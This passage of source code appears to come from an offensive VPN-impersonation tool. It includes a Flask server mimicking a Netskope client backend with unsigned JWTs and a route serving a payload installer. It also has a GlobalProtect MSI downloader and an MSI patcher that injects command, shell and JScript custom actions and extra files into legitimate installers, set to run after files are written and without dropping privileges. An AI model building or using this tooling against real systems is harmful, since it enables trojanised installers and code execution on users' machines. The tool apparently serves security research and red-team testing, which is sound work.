"useSerialNumberAsHostname": "0", "useWebView2": "1", "use_custom_primary_identifier_user": "0", "userNotification": "1", "user_manager_api_enabled": "0", "user_manager_for_group_memberships": "0", "user_manager_object_lock": "0", "validate_email_format": "1", "validateusertenant": "0", "versioned_steering": "1" } elif userconfig == "1": data = { "autoUninstall": "0", "onpremcheck": { "onprem_additional_http_hosts": [], "onprem_additional_ips": [], "onprem_host": "", "onprem_http_host": "", "onprem_http_tcp_connection_timeout": "", "onprem_ip": "", "onprem_use_dns": "" }, "privateApps": { "reauth": { "grace_period": 0, "interval": 0 }, "reauth_enabled": "false" } } return jsonify(data) @self.flask_app.route("/config/getoverlappingdomainlist", methods=["GET"]) def getoverlappingdomainlist(): data = { "overlappingDomainList": { "1": [ "example.co.uk" ], "2": [ "example.net" ], "3": [ "example.org" ], "4": [ "example.com" ] }, "status": "OK" } return jsonify(data) @self.flask_app.route("/client/deviceclassification", methods=["POST"]) def deviceclassification(): data = { "status": "success", "latest_modified_time": self.timestamp(), "deviceClassification": [ [ "Test Laptops" ], [ -2 ] ] } return jsonify(data) @self.flask_app.route("/v2/update/clientstatus", methods=["POST"]) def clientstatus(): data = {"status": "success"} return jsonify(data) @self.flask_app.route("/v2/checkupdate", methods=["GET"]) def checkupdate(): os = request.args.get('os') client_hash = self.tenant_config["client_hash"] client_version = self.tenant_config["client_version"] data = {} if os == "win": data = { "version": client_version, "downloadurl": f"https://{self.dns_name}/dlr/{client_hash}?version={client_version}", "upload_timestamp": int(time.time()) } return jsonify(data) @self.flask_app.route("/api/clients", methods=["POST"]) def clients(): data = {"errors":["token jti not valid"]} return jsonify(data), 401 @self.flask_app.route("/api/v0.2/footprint/", methods=["GET", "POST"]) def 
footprint(id): data = {} # TODO: fetch or minimise this data if request.method == "GET": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "default", "version": self.version_hex(), "rtt_protocol": "tcp", "client_country": "GB", "pops": [ { "name": self.tenant_config["pop_name"], "distance": 10.91245919002901, "rtt_endpoints": [ { "ip": self.external_ip, "port": 443, "scheme": "http", "path": "/" }, ], "country": "GB", "in_country": True, "dp_gateway_fqdn": self.tenant_config["dp_gateway_fqdn"], "ip_address": self.external_ip } ] } elif request.method == "POST": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "default", "pops": [ { "name": self.tenant_config["pop_name"], "ip": self.external_ip } ] } return jsonify(data) @self.flask_app.route("/api/v0.2/npa/footprint/", methods=["GET", "POST"]) def npa_footprint(id): data = {} if request.method == "GET": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "npa", "version": self.version_hex(), "rtt_protocol": "tcp", "client_country": "GB", "pops": [ { "name": self.tenant_config["pop_name"], "distance": 10.91245919002901, "rtt_endpoints": [ { "ip": self.external_ip, "port": 443, "scheme": "http", "path": "/" }, { "ip": self.external_ip, "port": 443, "scheme": "http", "path": "/" } ], "country": "GB", "in_country": True, "npa_gateway_fqdn": self.tenant_config["npa_gateway_host"], "npa_stitcher_fqdn": self.tenant_config["stitcher_host"], "npa_gateway_ip": self.external_ip, "npa_stitcher_ip": self.external_ip } ] } elif request.method == "POST": data = { "egress_ip": "1.2.3.4", "request_id": self.request_id(), "scope": "npa", "pops": [ { "name": self.tenant_config["pop_name"], "npa_gateway_ip": self.external_ip, "npa_gateway_fqdn": self.tenant_config["npa_gateway_host"], "npa_stitcher_ip": self.external_ip, "npa_stitcher_fqdn": self.tenant_config["stitcher_host"], "country": "GB", "in_country": True } ] } return jsonify(data) 
@self.flask_app.route("/steering/categories", methods=["GET"]) def steering_categories(): data = { "status": "success", "steering_config_name": "Test Steering Configuration", "webcat_ids": [] } return jsonify(data) @self.flask_app.route("/v2/config/org/getmanagedchecks", methods=["GET"]) def getmanagedchecks(): data = { "device_classification_rules": { "win": { "domain_check": { "domains": [ "nachovpn.local" ] } } }, "latest_modified_time": self.timestamp() } return jsonify(data) @self.flask_app.route("/steering/pinnedapps", methods=["GET"]) def pinnedapps(): data = { "certPinnedAppList": [], "status": "success", "steering_config_name": "Test Steering Configuration" } return jsonify(data) @self.flask_app.route("/steering/exceptions", methods=["GET"]) def steering_exceptions(): data = { "fail_close": { "domains": [], "ips": [] }, "ips": [], "names": [], "protocols": {}, "status": "success", "steering_config_name": "Test Steering Configuration" } return jsonify(data) @self.flask_app.route("/config/org/cert", methods=["GET"]) def org_cert(): return Response(self.get_org_cert(), mimetype='application/x-pem-file', headers={'Content-Disposition': 'attachment; filename="cert.pem"'}) @self.flask_app.route("/config/ca/cert", methods=["GET"]) def ca_cert(): return Response(self.get_ca_cert(), mimetype='application/x-pem-file', headers={'Content-Disposition': 'attachment; filename="cert.pem"'}) @self.flask_app.route("/v2/config/user/cert", methods=["GET"]) def user_cert(): return Response(self.get_user_cert(), mimetype='application/x-pkcs12', headers={'Content-Disposition': 'attachment; filename="nsusercert.p12"'}) @self.flask_app.route("/v1/steering/domains", methods=["GET"]) def steering_domains(): data = { "bwan_apps_enabled": 0, "bwan_apps_off_prem": 0, "bwan_apps_on_prem": 0, "bypass_option": 0, "domain_ports": {}, "domains": [ self.tenant_config["addon_manager_host"], ], "dynamic_steering": 0, "offprem_bypass_option": 0, "offprem_steering_method": 0, 
"offprem_steering_method_none": 0, "onprem_bypass_option": 0, "onprem_steering_method": 0, "onprem_steering_method_none": 0, "private_apps_enabled": 1, "private_apps_enabled_specific": 0, "private_apps_off_prem": 0, "private_apps_off_prem_specific": 0, "private_apps_on_prem": 0, "private_apps_on_prem_specific": 0, "private_apps_other_steering_method": 0, "status": "success", "steering_config_name": "Test Steering Configuration", "steering_method_none": 0, "traffic_mode": "web" } return jsonify(data) @self.flask_app.route("/config/org/version", methods=["GET"]) def org_version(): return jsonify({"config_version": "2025-03-05 14:01:01.629725", "status": "success"}) @self.flask_app.route("/netskope/generate_command", methods=["GET"]) def generate_command(): """ Generate a JWT token for the enrollment request """ token = jwt.encode( { "Iss": "client", "iat": int(time.time()), "exp": int(time.time() + 3600), "UserEmail": self.tenant_config["user_email"], "OrgKey": self.tenant_config["orgkey"], "AddonUrl": self.tenant_config["addon_manager_host"], "TenantId": self.tenant_config["tenant_id"], "nbf": int(time.time() - 3600), "UTCEpoch": int(time.time()), }, key=b"", algorithm=None) command = { "148": { "tenantName": self.tenant_config["tenant_name"], "idpTokenValue": token } } return jsonify(command) @self.flask_app.route("/dlr/", methods=["GET"]) def download_client(download_hash): download_file = os.path.join(self.payload_dir, "STAgent.msi") if not os.path.exists(download_file): abort(404) return send_file(download_file, as_attachment=True) @self.flask_app.route('/nsauth/client/authenticate', methods=["POST", "GET"]) def authenticate(): token = jwt.encode( { "Iss": "authsvc", "OrgKey": self.tenant_config["orgkey"], "UserEmail": self.tenant_config["user_email"], "PopName": self.tenant_config["pop_name"], "TenantId": self.tenant_config["tenant_id"], "AddonUrl": self.tenant_config["addon_manager_host"], "UTCEpoch": int(time.time()), "nbf": int(time.time() - 3600), "exp": 
int(time.time() + 3600), "tenant_rotation_state": None, "rotateCert": False, }, key=b"", algorithm=None) html = self.render_template('auth.html', jwt_token=token) return Response(html, mimetype='text/html') @self.flask_app.route("/config/org/gettunnelpolicy", methods=["GET"]) def gettunnelpolicy(): return jsonify({"status":"success","tunnelPolicy":[]}) ================================================ FILE: src/nachovpn/plugins/netskope/templates/auth.html ================================================ Authentication Success

Authentication successful

Configuration will automatically be downloaded.

You are being redirected

# ================================================ FILE: src/nachovpn/plugins/paloalto/__init__.py ================================================
# ================================================ FILE: src/nachovpn/plugins/paloalto/msi_downloader.py ================================================
import xml.etree.ElementTree as ET
import argparse
import sys
import os


class MSIDownloader:
    """Fetch the latest GlobalProtect MSI installers from Palo Alto's public S3 bucket."""

    def __init__(self, output_dir):
        self.xml_url = "https://pan-gp-client.s3.amazonaws.com"
        self.x86_msi = "GlobalProtect.msi"
        self.x64_msi = "GlobalProtect64.msi"
        self.output_dir = output_dir

    @staticmethod
    def _version_key(key):
        """Numeric sort key for S3 keys shaped like '<version>/<file>.msi'.

        Fix: plain lexicographic sorting misorders versions (e.g. '6.10.0'
        sorts before '6.2.0'), so the leading path component is split on
        dots and compared numerically instead.
        """
        version = key.split('/')[0]
        parts = []
        for component in version.split('.'):
            digits = ''.join(c for c in component if c.isdigit())
            parts.append(int(digits) if digits else 0)
        return tuple(parts)

    def get_latest_versions(self):
        """Return (x86_key, x64_key) for the newest MSI versions listed in the bucket.

        Raises requests.HTTPError on a failed bucket listing.
        """
        import requests  # lazy: keeps version helpers usable without requests installed
        response = requests.get(self.xml_url)
        response.raise_for_status()
        root = ET.fromstring(response.content)
        ns = {'s3': 'http://s3.amazonaws.com/doc/2006-03-01/'}
        contents = root.findall('.//s3:Contents', ns)
        x86_keys = [c.find('s3:Key', ns).text for c in contents
                    if 'GlobalProtect.msi' in c.find('s3:Key', ns).text]
        x64_keys = [c.find('s3:Key', ns).text for c in contents
                    if 'GlobalProtect64.msi' in c.find('s3:Key', ns).text]
        # Sort numerically by version, not lexicographically (fixes 6.10 vs 6.2 ordering)
        latest_version_x86 = sorted(x86_keys, key=self._version_key)[-1]
        latest_version_x64 = sorted(x64_keys, key=self._version_key)[-1]
        return latest_version_x86, latest_version_x64

    def download_file(self, url, output_path):
        """Stream *url* to *output_path*, drawing a simple progress bar on stdout."""
        import requests  # lazy: keeps version helpers usable without requests installed
        print(f"Downloading file from: {url}")
        response = requests.get(url, stream=True)
        response.raise_for_status()
        total_size = int(response.headers.get('content-length', 0))
        block_size = 1024
        current_size = 0
        with open(output_path, 'wb') as f:
            for data in response.iter_content(block_size):
                current_size += len(data)
                f.write(data)
                # Calculate progress (only when the server reported a content-length)
                if total_size:
                    progress = int(50 * current_size / total_size)
                    sys.stdout.write(f"\rDownloading: [{'=' * progress}{' ' * (50-progress)}] {current_size}/{total_size} bytes")
                    sys.stdout.flush()
        # New line after progress bar
        print()

    def download_latest_msi(self):
        """Download the newest x86 and x64 MSIs into *output_dir* and sanity-check them.

        Raises Exception if either downloaded file is empty.
        """
        latest_version_x86, latest_version_x64 = self.get_latest_versions()
        x86_url = f"{self.xml_url}/{latest_version_x86}"
        x64_url = f"{self.xml_url}/{latest_version_x64}"
        print(f"Downloading latest MSI files (version: {latest_version_x86.split('/')[0]})")

        # Download both MSI files
        os.makedirs(self.output_dir, exist_ok=True)
        x86_path = os.path.join(self.output_dir, self.x86_msi)
        x64_path = os.path.join(self.output_dir, self.x64_msi)

        print(f"Downloading: {self.x86_msi}")
        self.download_file(x86_url, x86_path)

        print(f"Downloading: {self.x64_msi}")
        self.download_file(x64_url, x64_path)

        # Verify downloads (an empty file means the fetch silently failed)
        if not os.path.getsize(x86_path) or not os.path.getsize(x64_path):
            raise Exception("Failed to download MSI files")

        print(f"Successfully downloaded {self.x86_msi} and {self.x64_msi}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Download GlobalProtect MSI files')
    parser.add_argument('-o', '--output-dir', default=os.path.join(os.getcwd(), 'downloads'),
                        help='Directory to store downloaded MSI files. Defaults to ./downloads/')
    parser.add_argument('-f', '--force', action='store_true',
                        help='Force download even if files exist')
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-d', '--download', action='store_true', help='Download latest MSI files')
    group.add_argument('-v', '--version', action='store_true', help='Show latest version information only')
    args = parser.parse_args()

    downloader = MSIDownloader(output_dir=args.output_dir)

    if args.version:
        x86_version, x64_version = downloader.get_latest_versions()
        print(f"Latest x86 version: {x86_version.split('/')[0]}")
        print(f"Latest x64 version: {x64_version.split('/')[0]}")

    # Check if MSI files exist or if force download is enabled
    elif args.download and (not os.path.exists(os.path.join(args.output_dir, "GlobalProtect.msi")) or \
            not os.path.exists(os.path.join(args.output_dir, "GlobalProtect64.msi")) or args.force):
        x86_version, x64_version = downloader.get_latest_versions()
        downloader.download_latest_msi()
        # Record which version was fetched so other tooling can read it back
        with open(os.path.join(args.output_dir, "msi_version.txt"), "w") as f:
            f.write(x64_version.split('/')[0])
    else:
        parser.print_help()
# ================================================ FILE: src/nachovpn/plugins/paloalto/msi_patcher.py ================================================
import logging
import argparse
import shutil
import os
import uuid
import warnings
import subprocess
import tempfile
import random
import string
import csv
import hashlib

if os.name == 'nt':
    warnings.filterwarnings("ignore", category=DeprecationWarning)
    import msilib

# https://learn.microsoft.com/en-us/windows/win32/msi/customaction-table
ACTION_TYPE_JSCRIPT = 6
ACTION_TYPE_CMD = 34
ACTION_TYPE_SHELL = 50

# https://learn.microsoft.com/en-us/windows/win32/msi/custom-action-return-processing-options
ACTION_TYPE_CONTINUE = 0x40         # Don't fail the installation if the command fails
ACTION_TYPE_ASYNC = 0x80            # Don't wait for the command to complete - only relevant for EXE commands

# https://learn.microsoft.com/en-us/windows/win32/msi/custom-action-in-script-execution-options
ACTION_TYPE_COMMIT = 0x200          # Only run once the files have been written to disk - useful for drop & exec
ACTION_TYPE_IN_SCRIPT = 0x400       # Schedule this as part of the installation process
ACTION_TYPE_NO_IMPERSONATE = 0x800  # Don't drop privs

ACTION_SEQUENCE_POSITION = 4999     # Fire the command after the files are written to disk by the installation process


def random_name(length=12):
    """Return a random ASCII-letter identifier of *length* characters."""
    return ''.join(random.choice(string.ascii_letters) for _ in range(length))


def random_hash():
    """Return an uppercase MD5 hex digest of a random name (used as a unique MSI key)."""
    return hashlib.md5(random_name().encode()).hexdigest().upper()


class MSIPatcher:
    """Abstract interface for patching MSI databases; platform subclasses below."""

    def get_msi_version(self, msi_path):
        raise NotImplementedError

    def increment_msi_version(self, msi_path):
        raise NotImplementedError

    def add_custom_action(self, msi_path, name, type, source, target, sequence):
        raise NotImplementedError

    def add_file(self, msi_path, file_path, component_name, feature_name):
        raise NotImplementedError

    def get_higher_version(self, version):
        """Return *version* bumped by one patch level, rolling over at 100.

        Fix: both subclasses call self.get_higher_version() from
        increment_msi_version(), but it was never defined anywhere in this
        module, so incrementing always raised AttributeError. Any '-suffix'
        (e.g. '6.2.0-c103') is stripped before bumping.
        """
        version = version.split('-')[0]
        major, minor, patch = map(int, version.split('.'))
        patch += 1
        if patch == 100:
            minor += 1
            patch = 0
        if minor == 100:
            major += 1
            minor = 0
        return f"{major}.{minor}.{patch}"


class MSIPatcherWindows(MSIPatcher):
    """MSI patching via the native msilib module (Windows only)."""

    def get_msi_version(self, msi_path):
        """Return the ProductVersion property of the MSI at *msi_path*."""
        db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_READONLY)
        view = db.OpenView("SELECT Value FROM Property WHERE Property='ProductVersion'")
        view.Execute(None)
        result = view.Fetch()
        version = result.GetString(1)
        view.Close()
        db.Close()
        return version

    def set_msi_version(self, msi_path, new_version, change_product_code=True):
        """Rewrite ProductVersion (and optionally ProductCode) in the MSI in place."""
        db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_DIRECT)
        view = db.OpenView("SELECT `Value` FROM `Property` WHERE `Property` = 'ProductVersion'")
        view.Execute(None)
        record = view.Fetch()
        current_version = None
        if record:
            current_version = record.GetString(1)
            update_view = db.OpenView("UPDATE `Property` SET `Value` = ? WHERE `Property` = 'ProductVersion'")
            update_record = msilib.CreateRecord(1)
            update_record.SetString(1, new_version)
            update_view.Execute(update_record)
            update_view.Close()
            db.Commit()
            if change_product_code:
                # A fresh ProductCode makes Windows treat this as a distinct product/upgrade
                new_product_code = '{' + str(uuid.uuid4()).upper() + '}'
                product_code_view = db.OpenView("UPDATE `Property` SET `Value` = ? WHERE `Property` = 'ProductCode'")
                product_code_record = msilib.CreateRecord(1)
                product_code_record.SetString(1, new_product_code)
                product_code_view.Execute(product_code_record)
                product_code_view.Close()
                db.Commit()
                logging.info(f"New ProductCode: {new_product_code}")
        if current_version and new_version:
            logging.info(f"MSI version updated from {current_version} to {new_version}")
        else:
            logging.error("ProductVersion property not found in MSI")
        view.Close()
        db.Close()

    def increment_msi_version(self, msi_path, change_product_code=True):
        """Bump the MSI's ProductVersion by one patch level."""
        current_version = self.get_msi_version(msi_path)
        if not current_version:
            logging.error("ProductVersion property not found in MSI")
            return False
        new_version = self.get_higher_version(current_version)
        self.set_msi_version(msi_path, new_version, change_product_code)

    def add_custom_action(self, msi_path, name, type, source, target, sequence):
        """Insert a CustomAction row and schedule it in *sequence* at ACTION_SEQUENCE_POSITION."""
        db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_DIRECT)

        # Create a property to store the source
        source_key = random_name()
        view = db.OpenView("INSERT INTO `Property` (`Property`, `Value`) VALUES (?, ?)")
        rec = msilib.CreateRecord(2)
        rec.SetString(1, source_key)
        rec.SetString(2, source)
        view.Execute(rec)
        view.Close()

        # Create a new CustomAction record
        ca = db.OpenView("INSERT INTO `CustomAction` "
                         "(`Action`, `Type`, `Source`, `Target`) "
                         "VALUES (?, ?, ?, ?)")
        rec = msilib.CreateRecord(4)
        rec.SetString(1, name)        # Action
        rec.SetInteger(2, type)       # Type
        rec.SetString(3, source_key)  # Source
        rec.SetString(4, target)      # Target
        ca.Execute(rec)
        ca.Close()
        db.Commit()

        # Schedule the CustomAction in the appropriate sequence
        seq = db.OpenView("INSERT INTO `" + sequence + "` "
                          "(`Action`, `Condition`, `Sequence`) "
                          "VALUES (?, ?, ?)")
        rec = msilib.CreateRecord(3)
        rec.SetString(1, name)  # Action
        rec.SetString(2, "")    # Condition (probably want to use "NOT Installed")
        rec.SetInteger(3, ACTION_SEQUENCE_POSITION)  # Sequence
        seq.Execute(rec)
        seq.Close()
        db.Commit()
        db.Close()
        return True

    def add_file(self, msi_path, file_path, component_name, feature_name):
        """Embed *file_path* into the MSI: cab stream + File/Component/Feature/Media rows."""
        db = msilib.OpenDatabase(msi_path, msilib.MSIDBOPEN_DIRECT)
        file_name = os.path.basename(file_path)
        file_key = f'_{random_hash()}'
        component_key = f'C_{file_key}'
        cab_name = f"_{random_hash()}"

        # Create a new cabinet file
        with tempfile.TemporaryDirectory() as temp_dir:
            cab_path = os.path.join(temp_dir, cab_name)
            self.create_cab_file(file_path, file_key, cab_path)
            # Add cabinet as a stream
            msilib.add_stream(db, cab_name, cab_path)

        # Get the highest existing sequence number from the File table
        max_sequence = 0
        view = db.OpenView("SELECT `Sequence` FROM `File`")
        view.Execute(None)
        while True:
            rec = view.Fetch()
            if not rec:
                break
            sequence = rec.GetInteger(1)
            if sequence > max_sequence:
                max_sequence = sequence
        view.Close()
        new_sequence = max_sequence + 1

        # Add to File table
        file_size = os.path.getsize(file_path)
        view = db.OpenView("INSERT INTO `File` (`File`, `Component_`, `FileName`, `FileSize`, `Version`, `Language`, `Attributes`, `Sequence`) VALUES (?, ?, ?, ?, ?, ?, ?, ?)")
        rec = msilib.CreateRecord(8)
        rec.SetString(1, file_key)
        rec.SetString(2, component_key)
        rec.SetString(3, file_name)
        rec.SetInteger(4, file_size)
        rec.SetString(5, '')
        rec.SetString(6, '')
        rec.SetInteger(7, 512)  # Attributes (compressed)
        rec.SetInteger(8, new_sequence)
        view.Execute(rec)
        view.Close()

        # Add to Component table
        view = db.OpenView("INSERT INTO `Component` (`Component`, `ComponentId`, `Directory_`, `Attributes`, `Condition`, `KeyPath`) VALUES (?, ?, ?, ?, ?, ?)")
        rec = msilib.CreateRecord(6)
        rec.SetString(1, component_key)
        rec.SetString(2, '{' + str(uuid.uuid4()).upper() + '}')
        rec.SetString(3, 'TARGETDIR')
        rec.SetInteger(4, 256)  # Attributes
        rec.SetString(5, '')
        rec.SetString(6, file_key)
        view.Execute(rec)
        view.Close()

        # Query the Feature table to get the Feature key
        view = db.OpenView("SELECT `Feature` FROM `Feature`")
        view.Execute(None)
        rec = view.Fetch()
        if not rec:
            feature_key = random_hash()
            view = db.OpenView("INSERT INTO `Feature` (`Feature`, `Feature_Parent`, `Title`, `Description`, `Display`, `Level`, `Directory_`, `Attributes`) VALUES (?, ?, ?, ?, ?, ?, ?, ?)")
            rec = msilib.CreateRecord(8)
            rec.SetString(1, feature_key)
            rec.SetString(2, '')
            rec.SetString(3, '')
            rec.SetString(4, '')
            rec.SetInteger(5, 2)
            rec.SetInteger(6, 1)  # Fix: Level is an integer column; was SetString(6, 1)
            rec.SetString(7, 'TARGETDIR')
            rec.SetInteger(8, 0)
            view.Execute(rec)
        else:
            feature_key = rec.GetString(1)
        view.Close()

        # Add to FeatureComponents table
        view = db.OpenView("INSERT INTO `FeatureComponents` (`Feature_`, `Component_`) VALUES (?, ?)")
        rec = msilib.CreateRecord(2)
        rec.SetString(1, feature_key)
        rec.SetString(2, component_key)
        view.Execute(rec)
        view.Close()

        # Add new Media entry
        logging.info("Adding new Media entry")
        max_disk_id = 0
        view = db.OpenView("SELECT `DiskId` FROM `Media`")
        view.Execute(None)
        while True:
            rec = view.Fetch()
            if not rec:
                break
            disk_id = rec.GetInteger(1)
            if disk_id > max_disk_id:
                max_disk_id = disk_id
        view.Close()
        logging.info(f"Existing max DiskId: {max_disk_id}")
        new_disk_id = max_disk_id + 1
        logging.info(f"New DiskId: {new_disk_id}")
        view = db.OpenView("INSERT INTO `Media` (`DiskId`, `LastSequence`, `DiskPrompt`, `Cabinet`) VALUES (?, ?, ?, ?)")
        rec = msilib.CreateRecord(4)
        rec.SetInteger(1, new_disk_id)
        rec.SetInteger(2, new_sequence)
        rec.SetString(3, '')
        rec.SetString(4, f'#{cab_name}')  # '#' prefix = cabinet stored as an internal stream
        view.Execute(rec)
        view.Close()

        db.Commit()
        db.Close()

        logging.info(f"Added file to MSI: {file_name}")
        logging.info(f"File key: {file_key}")
        logging.info(f"Component key: {component_key}")
        logging.info(f"Sequence number: {new_sequence}")
        logging.info(f"New Media entry: DiskId {new_disk_id}")
        return True

    @staticmethod
    def create_cab_file(file_path, file_key, output_path):
        """Pack *file_path* into a single-entry cabinet at *output_path*, keyed by *file_key*."""
        from cabarchive import CabArchive, CabFile  # lazy: third-party, only needed here
        arc = CabArchive()
        with open(file_path, 'rb') as f:
            arc[file_key] = CabFile(f.read())
        with open(output_path, 'wb') as f:
            f.write(arc.save(True))


class MSIPatcherLinux(MSIPatcher):
    """MSI patching via the msitools CLI (msidump/msibuild) on non-Windows hosts."""

    def get_msi_version(self, msi_path):
        """Return the ProductVersion property by dumping the Property table with msidump."""
        with tempfile.TemporaryDirectory() as temp_dir:
            subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True)
            property_file = os.path.join(temp_dir, 'Property.idt')
            with open(property_file, 'r') as f:
                reader = csv.reader(f, delimiter='\t')
                for row in reader:
                    if row[0] == 'ProductVersion':
                        return row[1]
        return None

    def increment_msi_version(self, msi_path, change_product_code=True):
        """Bump the MSI's ProductVersion by one patch level."""
        current_version = self.get_msi_version(msi_path)
        if not current_version:
            logging.error("ProductVersion property not found in MSI")
            return False
        new_version = self.get_higher_version(current_version)
        self.set_msi_version(msi_path, new_version, change_product_code)

    def set_msi_version(self, msi_path, new_version, change_product_code=True):
        """Rewrite ProductVersion (and optionally ProductCode) by editing Property.idt."""
        with tempfile.TemporaryDirectory() as temp_dir:
            subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True)
            property_file = os.path.join(temp_dir, 'Property.idt')
            updated_property_rows = []
            current_version = None
            new_product_code = None
            with open(property_file, 'r') as f:
                reader = csv.reader(f, delimiter='\t')
                for row in reader:
                    if row[0] == 'ProductVersion':
                        current_version = row[1]
                        row[1] = new_version
                    elif row[0] == 'ProductCode' and change_product_code:
                        new_product_code = '{' + str(uuid.uuid4()).upper() + '}'
                        row[1] = new_product_code
                    updated_property_rows.append(row)
            with open(property_file, 'w', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerows(updated_property_rows)
            subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'Property.idt')], check=True)
            if current_version and new_version:
                logging.info(f"MSI version updated from {current_version} to {new_version}")
            if new_product_code:
                logging.info(f"New ProductCode: {new_product_code}")

    def add_custom_property(self, msi_path, name, value):
        """Append a single property row to the MSI's Property table."""
        with tempfile.TemporaryDirectory() as temp_dir:
            subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True)
            property_file = os.path.join(temp_dir, 'Property.idt')
            with open(property_file, 'a', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerow([name, value])
            subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'Property.idt')], check=True)
        return True

    def add_custom_action(self, msi_path, name, type, source, target, sequence):
        """Insert a CustomAction row and schedule it in *sequence* via the dumped .idt tables."""
        with tempfile.TemporaryDirectory() as temp_dir:
            subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True)

            # Create a property to store the source
            source_key = random_name()
            property_file = os.path.join(temp_dir, 'Property.idt')
            with open(property_file, 'a', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerow([source_key, source])

            # Add CustomAction
            custom_action_file = os.path.join(temp_dir, 'CustomAction.idt')
            with open(custom_action_file, 'a', newline='') as f:
                # Configure the CSV writer not to wrap fields in quotes even if they contain special chars,
                # and to only try to escape \t and ` (which shouldn't occur in most Windows commands)
                writer = csv.writer(f, delimiter='\t', quoting=csv.QUOTE_NONE, quotechar='`')
                writer.writerow([name, str(type), source_key, target])

            # Add to sequence
            sequence_file = os.path.join(temp_dir, f'{sequence}.idt')
            with open(sequence_file, 'a', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerow([name, '', str(ACTION_SEQUENCE_POSITION)])

            # Add the property file to the MSI
            subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, 'Property.idt')], check=True)

            # Add the custom action to the MSI
            # For some reason the property file needs to be added twice like this
            subprocess.run(['msibuild', msi_path,
                            '-i', os.path.join(temp_dir, 'Property.idt'),
                            '-i', os.path.join(temp_dir, 'CustomAction.idt')], check=True)

            # Add the sequence to the MSI
            subprocess.run(['msibuild', msi_path, '-i', os.path.join(temp_dir, f'{sequence}.idt')], check=True)
        return True

    def add_file(self, msi_path, file_path, component_name, feature_name):
        """Embed *file_path* into the MSI by editing dumped .idt tables and rebuilding."""
        with tempfile.TemporaryDirectory() as temp_dir:
            subprocess.run(['msidump', '-d', temp_dir, msi_path], check=True)
            file_name = os.path.basename(file_path)
            file_key = f'_{random_hash()}'
            component_key = f'C_{file_key}'
            cab_name = f"_{random_hash()}"

            # Create a new cabinet file
            cab_path = os.path.join(temp_dir, cab_name)
            self.create_cab_file(file_path, file_key, cab_path)

            # Get the highest existing sequence number from the File table
            file_table = os.path.join(temp_dir, 'File.idt')
            max_sequence = 0
            with open(file_table, 'r') as f:
                reader = csv.reader(f, delimiter='\t')
                # Skip headers (.idt files carry a 3-line header block)
                for _ in range(3):
                    next(reader)
                for row in reader:
                    if row and len(row) > 7 and row[7].isdigit():
                        max_sequence = max(max_sequence, int(row[7]))  # Sequence is the 8th column
            new_sequence = max_sequence + 1

            # Add to File table
            file_size = os.path.getsize(file_path)
            with open(file_table, 'a', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerow([file_key, component_key, file_name, file_size, '', '', 512, new_sequence])

            # Add to Component table
            component_table = os.path.join(temp_dir, 'Component.idt')
            with open(component_table, 'a', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerow([component_key, '{' + str(uuid.uuid4()).upper() + '}', 'TARGETDIR', 256, '', file_key])

            # Query the Feature table to get the Feature key
            feature_table = os.path.join(temp_dir, 'Feature.idt')
            feature_key = None
            with open(feature_table, 'r') as f:
                reader = csv.reader(f, delimiter='\t')
                # Skip headers
                for _ in range(3):
                    next(reader)
                row = next(reader, None)
                if row:
                    feature_key = row[0]
            if feature_key is None:
                feature_key = random_hash()
                with open(feature_table, 'a', newline='') as f:
                    writer = csv.writer(f, delimiter='\t')
                    writer.writerow([feature_key, '', '', '', 2, 1, 'TARGETDIR', 0])

            # Add to FeatureComponents table
            feature_components_table = os.path.join(temp_dir, 'FeatureComponents.idt')
            with open(feature_components_table, 'a', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerow([feature_key, component_key])

            # Add new Media entry
            media_table = os.path.join(temp_dir, 'Media.idt')
            new_disk_id = 1
            with open(media_table, 'r') as f:
                reader = csv.reader(f, delimiter='\t')
                # Skip headers
                for _ in range(3):
                    next(reader)
                for row in reader:
                    new_disk_id = max(new_disk_id, int(row[0])) + 1
            with open(media_table, 'a', newline='') as f:
                writer = csv.writer(f, delimiter='\t')
                writer.writerow([new_disk_id, new_sequence, '', f'#{cab_name}', '', ''])

            # Add cabinet file to MSI
            subprocess.run(['msibuild', msi_path, '-a', cab_name, cab_path], check=True)

            # Rebuild MSI with modified tables
            logging.info(f"Rebuilding MSI from: {temp_dir}")
            subprocess.run(['msibuild', msi_path,
                            '-i', os.path.join(temp_dir, 'File.idt'),
                            '-i', os.path.join(temp_dir, 'Component.idt'),
                            '-i', os.path.join(temp_dir, 'Feature.idt'),
                            '-i', os.path.join(temp_dir, 'FeatureComponents.idt'),
                            '-i', os.path.join(temp_dir, 'Media.idt')], check=True)

            logging.info(f"Added file to MSI: {file_name}")
            logging.info(f"File key: {file_key}")
            logging.info(f"Component key: {component_key}")
            logging.info(f"Sequence number: {new_sequence}")
            logging.info(f"New Media entry: DiskId {new_disk_id}")
        return True

    @staticmethod
    def create_cab_file(file_path, file_key, output_path):
        """Pack *file_path* into a single-entry cabinet at *output_path*, keyed by *file_key*."""
        from cabarchive import CabArchive, CabFile  # lazy: third-party, only needed here
        arc = CabArchive()
        with open(file_path, 'rb') as f:
            arc[file_key] = CabFile(f.read())
        with open(output_path, 'wb') as f:
            f.write(arc.save(True))


def get_msi_patcher():
    """Return the MSIPatcher implementation suitable for the current platform."""
    if os.name == 'nt':
        return MSIPatcherWindows()
    return MSIPatcherLinux()


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
